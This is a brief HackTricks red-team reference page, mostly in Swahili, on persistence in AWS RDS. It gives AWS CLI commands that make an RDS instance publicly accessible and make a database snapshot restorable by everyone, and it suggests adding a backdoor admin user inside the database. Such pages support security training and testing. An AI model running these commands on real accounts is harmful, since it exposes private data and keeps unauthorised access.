AWS - RDS Persistence

Reading time: 2 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

RDS

Kwa taarifa zaidi, angalia:

AWS - Relational Database (RDS) Enum

Fanya instance ipatikane kwa umma: rds:ModifyDBInstance

Mshambuliaji mwenye ruhusa hii anaweza kubadilisha instance ya RDS iliyopo ili kuwezesha upatikanaji wa umma.

bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Unda mtumiaji admin ndani ya DB

Mshambuliaji anaweza tu kuunda mtumiaji ndani ya DB, hivyo hata kama nenosiri la mtumiaji mkuu linabadilishwa, hatapoteza ufikiaji wa database.

Fanya snapshot iwe ya umma

bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks